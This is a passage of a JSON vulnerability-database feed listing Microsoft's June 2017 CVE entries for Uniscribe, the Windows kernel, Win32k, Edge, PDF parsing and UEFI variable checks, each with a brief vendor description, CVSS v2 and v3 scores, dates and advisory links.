"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8534"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8534", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8534", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email or instant message that takes users to the attacker's website, or by opening an attachment sent through email.\n\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit this vulnerability and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8528", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8528", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists in the way that Microsoft browser 
JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8524", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8524", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8524", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0282", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0282", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0282", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. 
An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability.\n\n * In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email message or in an Instant Messenger message that takes users to the attacker's website, or by opening an attachment sent through email.\n\n * In a file sharing attack scenario, an attacker could provide a specially crafted document file that is designed to exploit this vulnerability, and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how the Windows font library handles embedded fonts.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Graphics Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8527"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8527", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8527", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8497", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8497", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8497", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8472", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8472", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8472", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8482", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8482", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8482", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows kernel initializes memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8462", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8462", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8462", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8490", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8490", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8490", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8468", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8468", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8468", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could 
run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8488", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8488", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8488", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An information disclosure vulnerability exists in Microsoft Windows when a user opens a specially crafted PDF file. 
An attacker who successfully exploited the vulnerability could read memory in the context of the current user.\n\nTo exploit the vulnerability, an attacker would have to trick the user into opening the PDF file.\n\nThe update addresses the vulnerability by modifying how Windows parses PDF files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows PDF Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8460", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8460", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8460", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists in Microsoft Windows, Microsoft Word 2013 and Microsoft Word 2016 if a user opens a specially crafted PDF file. 
An attacker who successfully exploited the vulnerability could cause arbitrary code to execute in the context of the current user.\n\nTo exploit the vulnerability, an attacker must entice the user to open a specially crafted PDF file.\n\nThe update addresses the vulnerability by modifying how Windows and Microsoft Word parse PDF files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows PDF Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0292", "CVE-2017-8529"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-0292", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0292", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8491", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8491", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8491", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks, which could allow an attacker to set variables that are either read-only or require authentication.\n\nTo exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable 
security in Windows.\n\nThe security update addresses the vulnerability by correcting security feature behavior to enforce case sensitivity for certain variable checks.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 